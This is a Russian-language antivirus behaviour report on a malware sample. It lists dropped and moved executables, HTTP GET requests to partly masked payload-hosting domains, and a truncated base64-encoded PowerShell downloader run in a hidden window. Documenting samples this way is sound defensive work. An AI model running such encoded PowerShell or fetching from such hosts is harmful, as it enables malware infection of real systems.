Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABBAGsAaABhAGwAeAAxAD0AKAAoACcAWgBwACcAKwAnAHgAJwApACsAKAAnAG4AJwArACcANAAwAGMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAHIAcABSAG8AZgBpAEwAZQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
Удаляет следующие файлы
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
Перемещает следующие файлы
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe в %WINDIR%\syswow64\bidispl\mfcm100u.exe
Подменяет следующие файлы
- %HOMEPATH%\gsnbi_a\zopfuit\ei244uop.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://jo###pper.com/8.7.19/UOULtnSR/
- http://to####eakhouse.com/wp-includes/GUjvEUEdmc/
UDP
- DNS ASK jo###pper.com
- DNS ASK to####eakhouse.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encod JABBAGsAaABhAGwAeAAxAD0AKAAoACcAWgBwACcAKwAnAHgAJwApACsAKAAnAG4AJwArACcANAAwAGMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABFAE4AdgA6AHUAcwBFAHIAcABSAG8AZgBpAEwAZQ...' (со скрытым окном)
